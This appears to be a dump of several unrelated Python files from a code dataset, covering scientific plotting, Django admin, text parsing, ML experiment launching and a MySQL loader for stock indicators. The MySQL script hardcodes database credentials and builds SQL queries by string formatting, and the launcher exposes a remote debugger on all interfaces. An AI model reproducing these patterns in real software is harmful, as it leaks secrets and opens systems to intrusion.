threshold values and store the number of links kept at each cut off point\n Args:\n host_data (dict)\n min_value (float): lowest value to test as threshold\n max_value (float): highest value to test as threshold\n increment (float): multiplier to use for incrementing threshold\n Returns:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n\n \"\"\"\n print(\"Generating ROC categories\")\n roc_data = dict()\n threshold_values = list()\n threshold = min_value\n while threshold < max_value:\n roc_data[threshold] = [0, set()]\n threshold_values.append(threshold)\n threshold *= increment\n for mobile_contig, copy_counts in host_data.items():\n for copy_count in copy_counts:\n for threshold in threshold_values:\n if threshold > copy_count:\n break\n roc_data[threshold][0] += 1\n roc_data[threshold][1].add(mobile_contig)\n for threshold in threshold_values:\n roc_data[threshold][1] = len(roc_data[threshold][1])\n return roc_data, threshold_values\n\n\ndef generate_roc_curve_values(roc_data, threshold_values, min_value):\n \"\"\"\n Generate the x and y values of the copy count thresholding ROC curve\n Args:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n min_value (float): lowest value to test as threshold\n Returns:\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC curve\n\n \"\"\"\n print(\"Generating ROC curve\")\n true_positives = list()\n false_positives = list()\n max_possible_hits_accepted = roc_data[min_value][0]\n max_possible_mobile_contigs_with_hosts = roc_data[min_value][1]\n for threshold in threshold_values:\n hits_accepted = roc_data[threshold][0]\n false_positives.append(hits_accepted / max_possible_hits_accepted)\n mobile_contigs_with_hosts = roc_data[threshold][1]\n true_positives.append(mobile_contigs_with_hosts / max_possible_mobile_contigs_with_hosts)\n return true_positives, false_positives\n\n\ndef calculate_area_under_curve(false_positives, true_positives):\n \"\"\"\n Calculate the area under a ROC curve\n Args:\n false_positives (list): x-values of a ROC curve\n true_positives (list): y-values of a ROC curve\n Returns:\n auc (float): area under the curve\n\n \"\"\"\n print(\"Calculating AUC\")\n auc = 0\n for i, false_positive in enumerate(false_positives):\n if i + 1 == len(false_positives):\n break\n x_delta = false_positives[i] - false_positives[i + 1]\n height = (true_positives[i] + true_positives[i + 1]) / 2\n auc += x_delta * height\n print(f\"ROC area under curve = {auc}\")\n return auc\n\n\ndef get_optimal_threshold(threshold_values, true_positives, false_positives, min_fraction_without_hosts=0.8):\n \"\"\"\n Run down the ROC curve and stop when the optimal threshold has been reached\n Args:\n threshold_values (list[float]): copy count threshold generated\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC curve\n min_fraction_without_hosts (float): lowest acceptable fraction of mobile elements still with a host\n Returns:\n optimal_threshold (float): the optimal copy count value\n fp_rate (float): the x-value on the ROC curve of the optimal cut-off\n tp_rate (float): the y-value on the ROC curve of the optimal cut-off\n\n \"\"\"\n print(\"Calculating optimal threshold\")\n optimal_threshold = 0\n fp_rate = 0\n tp_rate = 0\n for i, threshold in enumerate(threshold_values):\n optimal_threshold = threshold\n fp_rate = false_positives[i]\n tp_rate = true_positives[i]\n if fp_rate + tp_rate < 1 or tp_rate < min_fraction_without_hosts:\n break\n print(f\"Optimal value = {optimal_threshold}\")\n return optimal_threshold, fp_rate, tp_rate\n\n\ndef plot_roc_curve(ax, true_positives, false_positives, fp_rate=1, tp_rate=1, optimal_threshold=None, auc=None):\n print(f\"Drawing ROC curve\")\n ax.plot(false_positives, true_positives, c=\"k\", alpha=0.3)\n ax.scatter(false_positives, true_positives, c=\"k\", alpha=0.6)\n ax.scatter([fp_rate], [tp_rate], c=\"r\")\n ax.plot([0, 1], [1, 0], \"--\", c=\"r\", alpha=0.5)\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-0.01, 1.01)\n ax.set_xlabel(\"Fraction of all hits kept\")\n ax.set_ylabel(\"Fraction of viruses with one host\")\n if auc is not None:\n auc = round(auc, 2)\n optimal_threshold = round(optimal_threshold, 2)\n ax.text(0.25, 0.78, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\ndef plot_host_validation(ax, prophage_validation, color=\"k\", label=None):\n xs = list()\n ys = list()\n chosen_validation = 0\n for x, y in prophage_validation.items():\n xs.append(x)\n ys.append(y)\n if x == 0.14:\n chosen_validation = y\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, c=color, alpha=0.3)\n ax.axvline(0.14, linestyle=\"--\", c=\"r\", alpha=0.4)\n ax.scatter(xs, ys, c=color, alpha=0.6, label=label)\n ax.scatter([0.14], [chosen_validation], c=\"r\")\n\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-1, 101)\n ax.set_xlabel(\"Minimum copy count threshold\")\n ax.set_ylabel(\"Percent validated prophage hosts\")\n ax.text(0.17, 70, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\n\ndef load_rarefaction_data(directory):\n master_data = dict()\n for filename in os.listdir(directory):\n path = os.path.join(directory, filename)\n read_ct = int(filename.split(\".\")[0].split(\"_\")[-1])\n data = load_host_links_all(path)\n master_data[read_ct] = data\n return master_data\n\n\ndef load_host_links_all(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n viral_depth = float(cut[3])\n bacteria = cut[5]\n intra_links = float(cut[9])\n inter_links = float(cut[11])\n if inter_links < 5 or intra_links < 10:\n continue\n links = int(cut[11])\n host_depth = float(cut[8])\n norm_links = (links / host_depth) / viral_depth\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if virus not in data:\n data[virus] = dict()\n data[virus][bacteria] = (links, norm_links, copy_count, adjusted_inter_vs_intra_ratio)\n return data\n\n\ndef get_contig_host_pool(master_data, min_count=4, max_to_plot=10):\n contig_host_pool = dict()\n for data in master_data.values():\n for virus, subdata in data.items():\n for host in subdata:\n contig_host = f\"{virus}:{host}\"\n if contig_host not in contig_host_pool:\n contig_host_pool[contig_host] = 0\n contig_host_pool[contig_host] += 1\n filtered_contig_host_pool = set()\n for contig_host, count in contig_host_pool.items():\n if len(filtered_contig_host_pool) > max_to_plot:\n break\n if count >= min_count:\n filtered_contig_host_pool.add(contig_host)\n print(f\"Kept {len(filtered_contig_host_pool)} out of {len(contig_host_pool)} virus:host links for plotting\")\n return filtered_contig_host_pool\n\n\ndef plot_data(contig_host_pool, master_data, n, ax):\n print(f\"plotting value {n}\")\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n xs = list()\n ys = list()\n for read_ct, data in master_data.items():\n if virus not in data:\n continue\n if host not in data[virus]:\n continue\n value = data[virus][host][n]\n xs.append(read_ct)\n ys.append(value)\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, \"-\", c=\"k\", alpha=0.03)\n # ax.plot(xs, ys, \"o\", c=\"k\", alpha=0.05, markersize=1)\n\n\ndef make_histogram_table(contig_host_pool, master_data, n):\n print(f\"making histogram data for value {n}\")\n bins = 50\n st = 0\n fi = 2\n bin_size = (fi - st) / bins\n\n xs = list()\n ys = list()\n x = st\n while x <= fi:\n read_ct = max(master_data.keys())\n data = master_data[read_ct]\n count = 0\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n value = data[virus][host][n]\n if x <= value < x + bin_size:\n count += 1\n xs.append(x)\n ys.append(count)\n x += bin_size\n for i, x in enumerate(xs):\n y = ys[i]\n print(x, y, sep=\"\\t\")\n\n\ndef main():\n master_data = load_rarefaction_data(\"rarefaction_data\")\n contig_host_pool = get_contig_host_pool(master_data, min_count=1, max_to_plot=10000)\n\n host_data = load_host_links(\"unfiltered_master_table.tsv\")\n all_prophage_validation = load_validation(\"validation_values_all_prophages.tsv\")\n single_host_prophage_validation = load_validation(\"validation_values_singlehost_prophages.tsv\")\n\n min_value = 0.0001\n roc_data, threshold_values = categorize_data_for_roc_analysis(host_data, min_value, 1000, 1.1)\n true_positives, false_positives = generate_roc_curve_values(roc_data, threshold_values, min_value)\n auc = calculate_area_under_curve(false_positives, true_positives)\n optimal_threshold, fp_rate, tp_rate = get_optimal_threshold(threshold_values, true_positives, false_positives)\n\n print(\"plotting subplots\")\n fig = plt.figure(figsize=(15, 5.4))\n initialize_plot_style()\n gs = gridspec.GridSpec(nrows=2, ncols=3, figure=fig)\n ax1 = fig.add_subplot(gs[0, 0])\n plt.gca().invert_xaxis()\n ax2 = fig.add_subplot(gs[1, 0])\n plt.gca().invert_xaxis()\n ax3 = fig.add_subplot(gs[:, 1])\n ax4 = fig.add_subplot(gs[:, 2])\n\n #########################\n for i, ax in enumerate([ax1, ax2]):\n ax.set_xscale(\"log\")\n plot_data(contig_host_pool, master_data, i + 2, ax)\n ax.set_xlim(105000000, 95000)\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n ax.set_ylim(-0.05, 3.05)\n ax2.set_xlabel(\"Hi-C library size (read count)\")\n ax1.set_ylabel(\"Copies per cell\")\n ax2.set_ylabel(\"Connectivity ratio (R')\")\n\n #########################\n plot_roc_curve(ax3, true_positives, false_positives, fp_rate=fp_rate, tp_rate=tp_rate,\n optimal_threshold=optimal_threshold, auc=auc)\n plot_host_validation(ax4, all_prophage_validation, label=\"All prophages\")\n plot_host_validation(ax4, single_host_prophage_validation, color=\"b\", label=\"Single-host prophages\")\n\n ax1.set_title(\"A\", fontsize=20, x=-0.1)\n ax2.set_title(\"B\", fontsize=20, x=-0.1, y=1.05)\n ax3.set_title(\"C\", fontsize=20, x=-0.1)\n ax4.set_title(\"D\", fontsize=20, x=-0.1)\n plt.tight_layout()\n plt.savefig(\"figure.png\", dpi=300)\n\n\nmain()\n","sub_path":"figures/figure_roc_curve/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":14349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"552792675","text":"from django.contrib import admin\nfrom tpo.app.models import UserProfile, Company\n\n\nclass UserProfileAdmin(admin.ModelAdmin):\n fields = ('name', 'username', 'email',)\n\n\nclass CompanyAdmin(admin.ModelAdmin):\n search_fields = ('name', 'tpr__name', 'tpr__email', 'tpr__username')\n list_display = ('name', 'tpr',)\n list_filter = ('type_of_company',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\nadmin.site.register(Company, CompanyAdmin)\n","sub_path":"tpo/app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115907838","text":"import re\r\n\r\n# Import txt, split the text file\r\nfilename = \"/Users/amitmin/Documents/research/dataParsing/phosphatase2.txt\"\r\ninfile = open(filename, 'r')\r\nlines = infile.readlines()\r\n#kinaseID and branchCoords\r\nlines2 = lines[10016:12152]\r\n#nodeX and nodeY values\r\nlines3 = lines[9813:10015]\r\n#textX and textY values\r\nlines4 = lines[12153:12355]\r\n# Dictionaries\r\n\r\nkinase = {}\r\n\r\npatternPath = re.compile('F_(.*?)\"')\r\nfor line in lines2:\r\n\tif re.match(r'\\t', line):\r\n\t\tif re.search(patternPath, line):\r\n\t\t\t# Make sure to use the join method to convert the returned List from findall into a string\r\n\t\t\tkinaseID = ''.join(re.findall(patternPath, line))\r\n\t\t\tif kinaseID[len(kinaseID) - 1] == \"_\":\r\n\t\t\t\tkinaseID = kinaseID[:-3]\r\n\t\t\tkinase[kinaseID] = {'pathID': kinaseID}\r\n\r\n\r\n\r\n# Parse branchCoords into the dictionary - Sloppy b/c coords span several lines\r\npatternPath2 = re.compile(r' d=\"(.*?)$')\r\npatternPath3 = re.compile(r'(?<=\\t\\t)(.*?)$')\r\ncoordBuilder = \"\"\r\n# old and new is necessary to make my parse work for the first kinase ID\r\noldID = \"\"\r\nnewID = \"\"\r\nfor line in lines2:\r\n\tif re.match(r'\\t 0:\n # make sure each complete iteration has gone through and easy for debug\n variants[i][\"runner_kwargs\"][\"pretrain_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"max_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"eval_interval\"] = 2\n variants[i][\"runner_kwargs\"][\"log_interval\"] = 4\n variants[i][\"pretrain_dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"pretrain_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"eval_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"random_subset_kwargs\"][\"subset_len\"] = 2\n \n run_experiments(\n script=\"vos/experiments/videoSeg.py\",\n affinity_code=affinity_code,\n experiment_title=experiment_title+(\"--debug\" if args.debug else \"\"),\n runs_per_setting=1,\n variants=variants,\n log_dirs=log_dirs,\n debug_mode=args.debug,\n )\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--debug', help= 'A common setting of whether to entering debug mode for remote attach',\n type= int, default= 0,\n )\n\n args = parser.parse_args()\n if args.debug > 0:\n # configuration for remote attach and debug\n import ptvsd\n import sys\n ip_address = ('0.0.0.0', 5050)\n print(\"Process: \" + \" \".join(sys.argv[:]))\n print(\"Is waiting for attach at address: %s:%d\" % ip_address, flush= True)\n # Allow other computers to attach to ptvsd at this IP address and port.\n ptvsd.enable_attach(address=ip_address,)\n # Pause the program until a remote debugger is attached\n ptvsd.wait_for_attach()\n print(\"Process attached, start running into experiment...\", flush= True)\n ptvsd.break_into_debugger()\n\n main(args)\n","sub_path":"vos/experiments/launch_maintrain_vos.py","file_name":"launch_maintrain_vos.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"281666533","text":"# def bubble_sort(l):\n# length = len(l)\n# for i in range(length):\n# try:\n# for j in range(length-i):\n# if l[j] > l[j+1]:\n# tmp = l[j+1]\n# l[j+1] = l[j]\n# l[j] = tmp\n# except IndexError:\n# pass\n#\n# return l\n\n#变量其实是地址 # 101011100111101011 #逻辑地址 -->物理地址 01111110001100\nimport datetime\n\ndef get_time():\n return datetime.time()\n\ndef f2():\n now = get_time()\n\ndef select_sort(l):\n\n now = get_time()\n\n length = len(l)\n for i in range(length):\n little = l[i]\n min_index = i+1\n for j in range(i+1,length):\n if l[j] < l[min_index]:\n min_index = j\n try:\n if l[min_index] < little:\n tmp = little\n l[i] = l[min_index]\n l[min_index] = tmp\n except IndexError:\n pass\n\n return l\n\n\n\n\n\n\n\na1 = [1,2,10,3,4,5,9,56,6,7,134,9]\n\n# print(select_sort(a1))\n\n\ndef muti_seli():\n sql = 'select 1;'\n sql2 = 'select 2;'\n\n\nx = None\nx12 = 'None'\n\n\nstr1 = \"\\\\r\"\n\nprint(str1)\n\nprint('-------')","sub_path":"rimi_linux_mysql/speach/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"105105068","text":"#coding=utf-8\r\n#!/home/pi/miniconda3/envs/py36/bin/python\r\n\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nfrom sqlalchemy import create_engine\r\nimport mysql.connector\r\nimport re\r\nimport csv\r\nimport time\r\nimport shutil\r\nimport os\r\nimport io\r\nfrom pandas import isnull\r\nfrom glob import glob\r\n\r\n# ip = '182.155.205.224'\r\n\r\nip = '127.0.0.1'\r\n\r\n# engine = create_engine( \"mysql+mysqldb://root:28wC75#D@127.0.0.1/StockDB?charset=utf8\" )\r\n\r\nenginePi = create_engine( 'mysql+mysqlconnector://pregaine:RF69xy7C@{}/mysql?charset=utf8'.format( ip ) )\r\n\r\ndef StrToDateFormat( data, val ):\r\n # print( 'data {}, val {}'.format( data, val ) )\r\n \r\n dt = datetime.strptime( val, '%y%m%d' )\r\n val = dt.strftime( \"%y-%m-%d\" )\r\n\r\n return val\r\n\r\n\r\nclass DB_TechAnalysis:\r\n\r\n def __init__( self, server, database, username, password ):\r\n\r\n self.df = pd.DataFrame( )\r\n self.src_df = pd.DataFrame( )\r\n\r\n self.d = { '月': 'TECH_M' }\r\n\r\n self.datelst = [ ]\r\n print( \"Initial Database connection...\" + database )\r\n self.dbname = database\r\n \r\n self.con_db = mysql.connector.connect( host = server,\r\n user = username,\r\n passwd = password,\r\n database = database,\r\n charset = \"utf8\"\r\n )\r\n \r\n self.cur_db = self.con_db.cursor( buffered = True )\r\n self.con_db.commit( )\r\n\r\n # TODO 如何查當下SQL 語言及時間格式\r\n # cmd = \"\"\"SET LANGUAGE us_english; set dateformat ymd;\"\"\"\r\n # self.cur_db.execute( cmd )\r\n\r\n self.stock = ''\r\n self.date = ''\r\n\r\n def ResetTable( self, data ):\r\n\r\n d = dict( 分 = 'DROP TABLE IF EXISTS TECH_H', \r\n 日 = 'DROP TABLE IF EXISTS TECH_D',\r\n 周 = 'DROP TABLE IF EXISTS TECH_W', \r\n 月 = 'DROP TABLE IF EXISTS TECH_M' )\r\n\r\n # Do some setup\r\n self.cur_db.execute( d[ data ] )\r\n \r\n print( 'Successfully Deleter ' + data )\r\n\r\n def CreateTable( self, data ):\r\n\r\n \r\n sql_m_cmd = '''\r\n CREATE TABLE mysql.TECH_M \r\n (\r\n stock varchar( 10 ) COLLATE utf8_bin NOT NULL,\r\n date DATE NOT NULL,\r\n \r\n open_price decimal(10, 2) NULL,\r\n high_price decimal(10, 2) NULL,\r\n low_price decimal(10, 2) NULL,\r\n close_price decimal(10, 2) NULL,\r\n volume bigint NULL,\r\n \r\n ma3 decimal(10, 2) NULL,\r\n ma6 decimal(10, 2) NULL,\r\n ma12 decimal(10, 2) NULL,\r\n ma24 decimal(10, 2) NULL,\r\n ma36 decimal(10, 2) NULL,\r\n ma60 decimal(10, 2) NULL,\r\n ma120 decimal(10, 2) NULL,\r\n \r\n rsi2 decimal(10, 2) NULL,\r\n rsi5 decimal(10, 2) NULL,\r\n rsi10 decimal(10, 2) NULL,\r\n \r\n k9_3 decimal(10, 2) NULL,\r\n d9_3 decimal(10, 2) NULL,\r\n k3_2 decimal(10, 2) NULL,\r\n d3_3 decimal(10, 2) NULL,\r\n \r\n mfi4 decimal(10, 2) NULL,\r\n mfi6 decimal(10, 2) NULL,\r\n mfi14 decimal(10, 2) NULL,\r\n\r\n macd_dif_6 decimal(10, 2) NULL,\r\n dem_12 decimal(10, 2) NULL,\r\n osc_6_12_9 decimal(10, 2) NULL,\r\n\r\n macd_dif_12 decimal(10, 2) NULL,\r\n dem_26 decimal(10, 2) NULL,\r\n osc6_12_26_9 decimal(10, 2) NULL,\r\n\r\n willr9 decimal(10, 2) NULL,\r\n willr18 decimal(10, 2) NULL,\r\n willr42 decimal(10, 2) NULL,\r\n willr14 decimal(10, 2) NULL,\r\n willr24 decimal(10, 2) NULL,\r\n willr56 decimal(10, 2) NULL,\r\n willr72 decimal(10, 2) NULL,\r\n \r\n plus_di decimal(10, 2) NULL,\r\n minus_di decimal(10, 2) NULL,\r\n dx decimal(10, 2) NULL,\r\n adx decimal(10, 2) NULL,\r\n upperband decimal(10, 2) NULL,\r\n middleband decimal(10, 2) NULL,\r\n dnperband decimal(10, 2) NULL,\r\n bb decimal(10, 2) NULL,\r\n w20 decimal(10, 2) NULL,\r\n bias20 decimal(10, 2) NULL,\r\n bias60 decimal(10, 2) NULL,\r\n\r\n INDEX name ( stock, date ),\r\n INDEX idx_stock ( stock ),\r\n INDEX idx_date ( date )\r\n\r\n )\r\n '''\r\n\r\n table_d = { '月': sql_m_cmd }\r\n\r\n self.cur_db.execute( table_d[ data ] )\r\n \r\n print( 'Successfully Create 技術指標 ' + data )\r\n\r\n def CompareDB( self, data ):\r\n \r\n # print( table_name, stock_num )\r\n \r\n cmd = 'SELECT date, volume FROM {0} WHERE stock = \\'{1}\\''.format( self.d[ data ], self.stock )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchall( )\r\n \r\n lst = [ ]\r\n\r\n for val in ft:\r\n \r\n date = val[ 0 ].strftime( '%y%m%d' )\r\n\r\n volume = val[ 1 ]\r\n \r\n lst.append( ( date, volume ) )\r\n\r\n df = pd.DataFrame( lst, columns = [ '日期', '成交量_資料庫取出' ] )\r\n # print( df.head( 5 ) )\r\n left = pd.merge( self.df, df, on = [ '日期' ], how = 'left' )\r\n left = left[ left[ '成交量_資料庫取出' ] != left[ '成交量' ] ]\r\n del left[ '成交量_資料庫取出' ]\r\n \r\n self.df = left \r\n \r\n for index, row in self.df.iterrows( ):\r\n # print( self.stock, row[ '日期' ] )\r\n self.FindDuplicate( row[ '日期' ] )\r\n \r\n # print( data, '刪除重覆寫入' )\r\n # print( self.df )\r\n\r\n def ReadCSV( self, file ):\r\n \r\n self.df = pd.read_csv( file, \r\n sep = ',', \r\n encoding = 'utf8', \r\n false_values = 'NA', \r\n dtype = { '日期': str } )\r\n \r\n self.df = self.df.replace( [ np.inf, -np.inf ], np.nan ) \r\n \r\n # self.df = self.df[ : 20 ]\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = \"%y%m%d\" ) \r\n # print( self.df )\r\n\r\n def FindDuplicate( self, data ):\r\n\r\n # 尋找重覆資料\r\n cmd = 'SELECT stock, date from mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = '''DELETE FROM mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'''.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n\r\n '''\r\n # 尋找重覆資料\r\n # cmd = 'SELECT stock, date from mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = 'DELETE FROM mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n '''\r\n\r\n def WriteDB( self, data ):\r\n \r\n \r\n '''\r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n lst = self.df.values.tolist( )\r\n\r\n if len( lst ) == 0:\r\n # print( '資料庫比對CSV無新資料 {}'.format( self.stock ) )\r\n return\r\n \r\n columns = [ 'stock', 'date', 'open_price', 'high_price ', 'low_price', 'close_price', 'volume',\r\n 'ma4', 'ma12', 'ma24', 'ma48', 'ma96', 'ma144', 'ma240', 'ma480', 'rsi2', 'rsi3',\r\n 'rsi4', 'rsi5', 'rsi10', 'k9_3', 'd9_3', 'k3_2', 'd3_3', 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', 'willr9',\r\n 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72', 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n \r\n lenVal = len( columns )\r\n \r\n var_string = ','.join( [ '%s' ] * lenVal )\r\n \r\n for val in lst:\r\n \r\n val[ 0 ] = self.stock\r\n \r\n # print( val ) \r\n # exit()\r\n \r\n # dt = datetime.strptime( val[ 1 ], '%y%m%d' )\r\n # val[ 1 ] = dt.strftime( \"%y-%m-%d\" )\r\n \r\n query_string = 'INSERT INTO mysql.TECH_W VALUES ( {} );'.format( var_string )\r\n\r\n # print( query_string )\r\n # print( '取出{}'.format( val ) )\r\n \r\n self.cur_db.execute( query_string, val )\r\n \r\n print( '寫入資料庫 {} {}'.format( val[ 0 ], val[ 1 ] ) )\r\n \r\n ''' \r\n \r\n \r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n if self.df.empty:\r\n # print( '{:<7}exist DB'.format( self.stock ) )\r\n return\r\n\r\n del self.df[ 'Unnamed: 0' ]\r\n self.df.insert( 0, 'stock', self.stock )\r\n\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = '%y%m%d' )\r\n # self.df[ '日期' ] = self.df[ '日期' ].dt.strftime( \"%y-%m-%d\" )\r\n\r\n # print( self.df, self.d[ data ] )\r\n\r\n \r\n self.df.columns = [ 'stock', 'date', 'open_price', 'high_price', 'low_price', 'close_price', 'volume',\r\n 'ma3', 'ma6', 'ma12', 'ma24', 'ma36', 'ma60', 'ma120',\r\n 'rsi2', 'rsi5', 'rsi10', \r\n 'k9_3', 'd9_3', 'k3_2', 'd3_3', \r\n 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', \r\n 'willr9', 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72',\r\n 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n\r\n\r\n # Try to send it to the access database (and fail)\r\n self.df.to_sql( name = self.d[ data ], \r\n con = enginePi, \r\n index = False, \r\n if_exists = 'append', \r\n index_label = None )\r\n \r\n print( '寫入資料庫{0:>2}{1:>7} {2}'.format( data, self.stock, self.date ) )\r\n\r\ndef main( ):\r\n \r\n db_M = DB_TechAnalysis( ip, 'mysql', 'pregaine', 'RF69xy7C' )\r\n \r\n # 移除表格\r\n db_M.ResetTable( '月' )\r\n\r\n # 建立資料表\r\n db_M.CreateTable( '月' )\r\n \r\n stock_M = { '月': [ db_M, '_月線技術指標.csv' ] }\r\n\r\n path = '/home/pi/Downloads/技術指標/month/'\r\n\r\n # 讀取資料夾\r\n for file in glob( '{}*_月線技術指標.csv'.format( path ) ):\r\n \r\n if os.path.getsize( file ) == 0:\r\n continue\r\n \r\n num = file.split( '_' )[ 0 ]\r\n num = num.replace( path, '' )\r\n data = file[ -10:-9 ]\r\n\r\n # print( file )\r\n\r\n if data in stock_M.keys( ):\r\n \r\n Obj = stock_M[ data ][ 0 ]\r\n Obj.stock = num\r\n \r\n print( '讀取 {}'.format( file ) )\r\n print( '股號 {}'.format( num ) )\r\n \r\n print( data )\r\n \r\n # if num != '2887':\r\n # continue\r\n\r\n Obj.ReadCSV( file )\r\n Obj.CompareDB( data ) \r\n Obj.WriteDB( data )\r\n\r\n else:\r\n print( '讀取錯誤 {}'.format( data ) )\r\n \r\n # exit()\r\n \r\nif __name__ == '__main__':\r\n\r\n start_tmr = time.time( )\r\n main( )\r\n print( '{:04.1f}'.format( (time.time( ) - start_tmr) ) )\r\n","sub_path":"寫入技術指標月.py","file_name":"寫入技術指標月.py","file_ext":"py","file_size_in_byte":12638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"331995994","text":"\"\"\"\n下载\n\"\"\"\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nfrom urllib.request import urlopen\n\nimport json\nimport requests\n\njson_url = \"https://raw.githubusercontent.com/muxuezi/btc/master/btc_close_2017.json\"\nresponse = urlopen(json_url)\n\n# 读取数据\nreq = response.read()\n# print(type(req))\n# print(req)\n# 将数据写入文件\nwith open(\"btc_close_2017_down.json\", 'wb') as f:\n f.write(req)\n\n# 加载json格式\n# with open(\"btc_close_2017_down.json\", 'r') as f:\n# file_urllib = json.load(f)\n# print(file_urllib)\nfile_urllib = json.loads(str(req, 'utf-8'))\nprint(file_urllib)\n\n# 使用requests\n\nreq = requests.get(json_url)\nwith open('btc_close_2017_down_requests.json', 'w') as f:\n f.write(req.text)\n\nprint(req.json())\n\n","sub_path":"PythonCrashCourse/chapter16/btc_close_2017.py","file_name":"btc_close_2017.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"81679905","text":"import numpy as np\nimport os\n\n\nclass Camera(object):\n\n def __init__(self):\n # C\n self.__c = None\n # P_{ref}\n self.__p_ref = None\n # V'\n self.__v_prime = None\n # h\n self.__h = None\n # d\n self.__d = None\n # f\n self.__f = None\n # N, U, V\n self.N = None\n self.__u = None\n self.__v = None\n # R, T\n self.__r = None\n self.__t = None\n # M_{view}, # M_{pers}\n self.m_view = None\n self.m_pers = None\n # M_{view}^{-1}, # 